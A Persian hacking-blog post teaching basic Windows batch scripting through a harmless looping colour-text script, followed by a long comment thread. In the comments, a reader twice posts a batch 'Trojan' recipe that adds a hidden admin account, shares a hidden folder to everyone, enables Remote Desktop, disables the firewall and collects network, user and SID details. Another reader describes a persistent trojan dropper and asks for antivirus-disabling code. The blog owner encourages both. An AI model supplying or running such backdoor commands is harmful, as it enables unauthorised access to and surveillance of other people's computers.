ساخت یک فایل بت :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات

در پست قبلی با بعضی از دستورات bat آشنا شدیم. در این پست یه فایل ساده میسازیم و مرحله به مرحله توضح میدم تا بیشتر و بهتر با دستورات بت آشنا شید.

این کدها تنها جنبه آموزشی دارن و کاربرد خاصی نخواهند داشت.

@echo off

:LOADING

cls

echo Processing.

ping localhost -n 2 >nul

cls

echo Processing..

ping localhost -n 2 >nul

cls

echo Processing...

ping localhost -n 2 >nul

cls

echo Loading....

ping localhost -n 2 >nul

cls

echo Starting.....

ping localhost -n 2 >nul

ping localhost -n 2 >nul

cls

color 0a

echo adade 1 ra vared konid.

echo 1) matrix rangi

set/p c=

if %c%==1 goto MATRIX

:MATRIX

cls

echo che rangi ra dost darid?

echo 1) sabz

echo 2) ghermez (long)

echo 3) abi (sarvar)

echo 4) soorati

set/p ch=

if %ch%==1 goto GREEN

if %ch%==2 goto RED

if %ch%==3 goto BLUE

if %ch%==4 goto PURPLE

:GREEN

color 02

set a=Virus32.blog.ir

echo %a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%

goto GREEN

:RED

color 04

set a=Virus32.blog.ir

echo %a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%

goto RED

:BLUE

color 01

set a=Virus32.blog.ir

echo %a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%

goto BLUE

:PURPLE

color 05

set a=Virus32.blog.ir

echo %a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%%a%

goto PURPLE

این فایل ابتدا کلمه پردازش را به کاربر نمایش میدهد

سپس از کاربر میخواهد تا عدد یک را وارد کند که در غیر این صورت برنامه بسته خواهد شد.

در قسمت بعدی از کاربر میخواهد تا عدد رنگ مورد علاقه خود را وارد کند.

بعد از وارد کردن عدد رنگ مورد نظر نوشته هایی به همان رنگ در صفحه سی ام دی بصورت متوالی نمایش داده خواهد شد.

بیشتر دستورات در پست قبلی توضیح داده شده اینجا با نحوه کاربردشون آشنا میشیم و فقط دستورات تعریف نشده رو توضیح میدم.

:LOADING

اینجا برچسب LOADING رو معرفی کرده. دقت کنید برچسب ها را با : معرفی میکنیم.

به زبان ساده تر :  اینجا سرگروه یک گروه رو میگیم برچسب. یعنی وقتی بخواهیم تعدادی از دستورات رو بهم ربط بدیم و یا بخواهیم چندتا دستور رو باهم اجرا کنیم (جدا از دستورات دیگر) در ابتدای این دستورات کارکتری را با : تعریف میکنیم که باعث میشه دستوراتی که بعد از این خط قرار میگیرن یک گروه رو تشکیل بدن. میتونیم هر اسم یا حرفی رو به عنوان سرگروه یا برچسب انتخاب کنیم

ping localhost -n 2 >nul

این دستور باعث میشه که دستور بعدی با دو ثانیه تاخیر اجرا یا نمایش داده بشه (اینجا دستور بعدی نمایش متن است). میتونیم بجای عدد 2 هر عدد دیگه ای رو قرار بدیم.

نظر (۱۶)

شرمنده ک سوالم مال این پست نیست این برنامه Hide ALL IP برای پنهان کردن ای پی و هم چنین عوض کردن هستش ولی من روش کار باهاش رو بلد نیستم اگه میشه ی توضیحی بده ممنون داداشی ببخش ک زیاد حرف میزنم (:
Virus 32 :
من تا حالا باهاش کار نکردم عزیز
داداش تو رو خدا کمکم کن یکی تو چت خیلی اذیتم میکنه حتی اسم برنامه های رو دسوتاپم روهم بهم مبگه :-(
Virus 32 :
تو که همیشه با پروکسی یا فیلتر شکنی مطمئنی شانسی نمیگه؟
تلنتت رو غیر فعال کن
سیستمت رو اسکن کن ببین بد افزار نداشته باشی
از تسک منیجر ببین چه برنامه هایی اجرا میشن
برنامه مشکوکی دیدی بهم خبر بده
من که میگم طرف فیلمت کرده چون امنیت ویندوز و گوشی تو خیلی خوبه
سلام دوسی نترس منم!!!
*
*
*
*
*
*
*
* الکی مثلا من به حرفات گوش کردم الان چند سال گذشته من هکر شدم ده تا ورژن بالاتر از تو!!!!!خخخخ ولی به جان خودم باهات کاری ندارم!!!
ولی میخواستم بگم من چندتا دونه باگ از وب شما دارم!! کار اموزای عزیز به من توجه کنید!!! دیگه با این ویروس 32 کاری نداشته باشید من اموزش میدم! واسه پیدا کردن باگ! وبلاگ دوستمون ویروس 32 کلیدهای ترکیبی کنترل+F رو بزنید حالا کلمه باگ رو سرچ کنید!!! حالشو ببرید باگ با رنگ سبز نشون داده میشه!!!!!!! ممنونم نیازی به تشکر نیست!خخخخخخخ

این شعر رو هم به افتخار خودم گفتم!!!!
*** من منم!! این من منم!!! VIRUS42 منم!خخخخخخ
تا اموزش بعدی شمارا به خداوند بزرگ میسپارم! شب همتون ویروسی!!!خخ



Virus 32 :
سلام عزیزم
یعنی خدا صبر بده به دکترای اون تیمارستانی که تو اونجا بستری میشی
در ضمن فعلا وبلاگ درست نمیکنم!!! میخوام با اجازه دوست خوبم جناب
VIRUS 32خخخخخخ ببخشید!!! تو همین وبلاگ اموزش بدم!!!
در ضمن شعار من اینه:**(( نه دوستانم و نه دشمنانم در امان نخواهند بود))** از دستم ناراحت نشید!! اخه من قرصامو سر وقت نمیخورم!! مخمل!! مخمل!! ببخشید مادرمه! توخونه اینطوری صدام میکنه باید برم قرصامو بخورم!! فعلا! ولی شما منوVIRUS 42 صدا کنیدا باشه؟؟؟؟؟!!! افرین
Virus 32 :

ای تو روحت تو فازت چیه داشی؟
ناموسا چی مصرف میکنی اینجوری میشی؟ نامرد باشم اگه منم هر روز مصرفش نکنم
حوصله هیچی نداشتم کامنتاتو دیدم همش دارم میخندم
یک در دنیا صد در آخرت خیر ببینی :)
سلام دوسی!!
به ی چیز باحال توجه کردی تا حالا؟؟؟


اینایی که بار اول میان تو وب تو و از مطالب خوششون میاد وقتی میخوان یه سوال ازت بپرسن چقد معذرت خواهی میکنن!!خخخخخخخخخخخخخ

فکر میکنن اگه سوال بی ربط بپرسن هک میشن!خخخخ

ولی اگه من بشم مدیر انقد باهاشون خوب میشم که وقتی میان تو وب همش سوال بی ربط بپرسن!خخخخخ بجه ها به من رای بدید
Virus 32 :
سلام رفیق
تو مدیر شی یه روز که قرصاتو پیدا نکنی همه مطالب رو پاک میکنی بجاش جوک  و فوحش میزاری برا بچه ها من مدمئنم :))
من خودم به شخصه بهت رای میدم داشی :) خخخخ
خخخخخخخخخخخخخخخ این کامنت اخریه ویروس42 خیلی باحال بووود لایک ههههههههههههههههه
Virus 32 :
:)
شلام دنبال یه نفر میگردم یکن هک و ازینا یادم بده ویروس سیوسه یا چلو دو کسی هست یا علی aref.d.10@gmail.com
بعدشم دوتا سایت هک کنیم بخندیم
سلام.
خخخ شما ها دیگه سوختید من آخرین ورژنم
Virus 32 :
:)
سلام ویروس جان میشه برنامه نویسی به زبان bat. رو توضیح بدی خیلی میخوام یاد بگیرم
خیلی جا ها به درد میخوره
Virus 32 :
سلام
چند تا پست درباره اش نوشتم اونارو ببین سر فرصت ادامه میدم
  • Virus32
  • 010102021001VIRUS gate
  • هر کی این پست منو همین الان خوند

    یک در اینجا صد در وبلاگ های دیگه هک شد.


    لطفا پس از هک شدن پیغام خود را بگزارید.

    مچکرم
    Virus 32 :
    خخخخخخخخخخ
    من هک شدم یکی بیاد بامن سلفی بگیره هههههه
    سلام مجدد داش.مطلب خوبی بود با این که تازه کارم 99% مطلبو فهمیدم.فقظ سه تا سوال اولی اینکه میشه کد های رنگ های بیشتری رو بدی مثل همین کدای 01 و05 و...
    دومی اینکه این کدا تا کدوم متنا رنگی میکنن؟تا قبل از متنی که قبلش یه کد رنگی جدید دادیم؟؟
    سومیم اینکه میشه یکار کرد که متنارا بزرگتر یا کوچیکتر نشون بده؟اگه میشه چجوری و تا چه حد میشه بزرگ و کوچیک کرد؟
    راسی جواب سوال دومیم که تو بخش حافظه ی جاسوسی پرسیدما ندادی حتی سوالا نشونم ندادی!؟!؟
    ممنون مشم جواب بدی
    با تشکر
    Virus 32 :
    سلام
     رنگ ها
    0 = سیاه 8 = خاکستری
    1 = آبی 9 = نور آبی
    2 = سبز A = نور سبز
    3 = سبز آبی B = نور آبی
    4 = قرمز C = نور قرمز
    5 = بنفش D = نور بنفش
    6 = زرد E = نور زرد
    7 = سفید F = روشن و سفید
    سوال دو
    هر وقت دستور تغییر رنگ صادر شد کل متن ها تبدیل به اون رنگ میشن
    سوال سه
    با کد نمیشه (من بلد نیستم) ولی سایز برنامه رو میشه افزایش داد با دستورات زیر

    mode con:cols=80 lines=100
    یا
    mode 1000
    سلام ویروس جان متلب پایینو میشه به طور واضح برام توضیح بدی میخوانم
    از طریق این ویروس پایین نفوذ کنم

    این مطلبو از توی یه سایت دیگه گیر اوردم

    من هر روز به این سایت سر میزنم امروز ساعت 3:30 دقیقه این نظر رو ارسال کردم تا ساعت 12:00 منتظر جوابت هستم.......
    ممنون میشم اگه زود جواب بدی

    میخوام بدونم تو قسمت share چطور پوشه میاد روی اکانت ما
    از کجا اکانت ما رو تشخیص میده شاید 2000 نوع اکانت با نام اکانت ما وجود داشته باشه چطور پوشه فقط میاد روی اکانت ما؟؟؟؟؟؟؟؟؟

    شروع ساخت Trojan

    یک فایل Text ایجاد کنید و فرمان های زیر را در آن بنویسید:

    1 – ایجاد یک User جدید با دسترسی Admin

    Net user iman 123456 /add

    Net localgroup administrators iman /add


    2 – الف - ایجاد یک پوشه مخفی در درایو ویندوز

    Mkdir c:\Hiva-folder

    :C

    \cd

    attrib hiva-folder +h

    2 – ب – Share کردن آن پوشه به صورت مخفی

    net share trojan-share$=c:\hiva-folder /grant:iman,full /grant:everyone,full


    3 – فعال کردن File and Printer Sharing

    netsh firewall set service type = fileandprint mode =enable


    4 – فعال کردن Remote Desktop در کامپیوتر هدف

    netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


    5 – به عهده شما ! ( می توانید این مورد را حذف کنید )


    6 – خاموش کردن فایروال

    Netsh advfirewall set allprofile state off


    7 – گرفتن اطلاعات IP ، MAC Address ، لیست کاربران، لیست منابع Share و SID اکانت Administrator

    ipconfig >>c:\Hiva-folder\%computername%.txt

    getmac >>c:\Hiva-folder\%computername%.txt

    net user >>c:\Hiva-folder\%computername%.txt

    net share >>c:\Hiva-folder\%computername%.txt

    wmic useraccount where name='administrator' get sid >>c:\Hiva-folder\%computername%.txt


    8 – لیست برنامه های نصب شده بر روی سیستم هدف

    Wmic product get name,version >> c:\Hiva-folder\%computername%.txt



    9 - خب حالا عبارت @echo off را در اولین خط این فایل text قرار دهید.



    10 - این فایل text را با نام dear-tro و پسوند .bat ذخیره کنید.
    Virus 32 :
    سلام رفیق
    دستورات خوبی هستن
    ولی نمیشه بهش گفت تروجان
    بیشتر این دستورات تو سیستم های امروزی اجرا نمیشن
    ولی در کل واسه شروع خوبه
    راستش قسمت share یا همون مرحله ۲ فک نکنم اجرا بشه الکی نوشته شده
    سلام میشه دستورات پایین رو برام توضیح بدی
    من این دستورات رو توی سایت ****************
    گیر اوردم اینارو باید توی فایل bat بزاری و ..........................


    1 – ایجاد یک User جدید با دسترسی Admin

    Net user iman 123456 /add

    Net localgroup administrators iman /add


    2 – الف - ایجاد یک پوشه مخفی در درایو ویندوز

    Mkdir c:\Hiva-folder

    :C

    \cd

    attrib hiva-folder +h

    2 – ب – Share کردن آن پوشه به صورت مخفی

    net share trojan-share$=c:\hiva-folder /grant:iman,full /grant:everyone,full


    3 – فعال کردن File and Printer Sharing

    netsh firewall set service type = fileandprint mode =enable


    4 – فعال کردن Remote Desktop در کامپیوتر هدف

    netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


    5 – به عهده شما ! ( می توانید این مورد را حذف کنید )


    6 – خاموش کردن فایروال

    Netsh advfirewall set allprofile state off


    7 – گرفتن اطلاعات IP ، MAC Address ، لیست کاربران، لیست منابع Share و SID اکانت Administrator

    ipconfig >>c:\Hiva-folder\%computername%.txt

    getmac >>c:\Hiva-folder\%computername%.txt

    net user >>c:\Hiva-folder\%computername%.txt

    net share >>c:\Hiva-folder\%computername%.txt

    wmic useraccount where name='administrator' get sid >>c:\Hiva-folder\%computername%.txt


    8 – لیست برنامه های نصب شده بر روی سیستم هدف

    Wmic product get name,version >> c:\Hiva-folder\%computername%.txt



    9 - خب حالا عبارت @echo off را در اولین خط این فایل text قرار دهید.



    10 - این فایل text را با نام dear-tro و پسوند .bat ذخیره کنید.
    راستی ویروس یه سوال دیگه چجوری میشه به گوشی نفوذ کرد
    سلام ویروس

    یه سوال من یه برنامه دارم که فایل های بتچ رو به exe تبدیل میکنه

    و به صورت مخفی اجرا میکنه میشه یه فایل دیگه هم به ان چسباند

    خب حالا من یه ویروس هم ساختم که توی استارت اپ کپی

    کپی میشه و با دستور پینگ از 86400 میشماره و تایمر رو ذخیره میکنه

    و هر بار که سیستم روشن شه بصورت مخفی میشماره بعد از اتمام

    شمارش و پایان یافتن تایمر روی سیستمش پورت های زیادی باز میکنه

    فایل رار که تروجان توشه و unrar.exe که بهش

    چسبانده بودم تروجان رو با فایل unrar.exe ازش خارج میکنه و سپس

    اجراش میکنه و کار های دیگه انجام میده حالا اگه متوجه حرفام شدی یا نه

    اشکالی ندازه من خواستم فقط بگم که زمان وارد کردن تروجان به سیستم

    انتی ویروس ESET حذفش میکنه کدی نیاز دارم که انتی ویروس eset رو

    غیر فعال کنه

    خب حالا این تا این جا

    =========================================

    یه سوال دیگه میخوام بدونم چرا زمان اجرای کد net view یا net use در

    سی ام دی با ارور زیر مواجه میشم

    net view

    System error 53 has occurred.

    The network path was not found.
    ==========================================

    net use

    System error 67 has occurred.

    The network name cannot be found.
    ==========================================
    Virus 32 :
    سلام
    هنوز کد بت برای دور زدن آنتی ویروس ها پیدا نکردم
    از کدهای ساده تر استفاده کن
    قبل از فعال کردن پورت دستور اجرا شدن یه برنامه کوچیک مثل نوت پد رو بده
    سعی کن پورتهایی که باز میکنی چهار رقمی باشن ;)
    ==============
    یا به شبکه وصل نیستی یا شیر نداشتی یا اینکه فایر وایلت بهت اجازه نمیده
    شبکه رو چک کن
    مسیر شیر ها یا روترهای متصل به سیستمت رو بررسی کن
    فایر والت رو برای لحظات کوتاهی غیر فعال کن و ....
    سلام ویروس میشه یه کد جاوا برامون بزاری که اینترنت اکسپلورر رو مخفی

    اجرا کنه
    ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
    شما میتوانید از این تگهای html استفاده کنید:
    <b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
    تجدید کد امنیتی